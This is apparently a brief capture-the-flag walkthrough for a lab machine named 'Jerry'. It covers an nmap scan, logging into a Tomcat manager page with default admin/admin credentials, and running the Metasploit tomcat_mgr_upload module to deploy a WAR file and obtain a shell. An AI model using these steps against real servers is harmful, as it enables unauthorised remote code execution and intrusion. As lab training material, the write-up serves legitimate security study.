🐱Jerry

start with a nmap:

We find a tomcat page:

we see the manager page button, that asks us for credentials, we do admin/admin and end up on this page

we see some credentials here that seem to be an example but who knows

i open up a private navigation shell and try to connect with those creds and it works

while looking around we see this:

While looking for .War reverse shell:

Tomcat | HackTricks | HackTricks

use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

and we got a shell: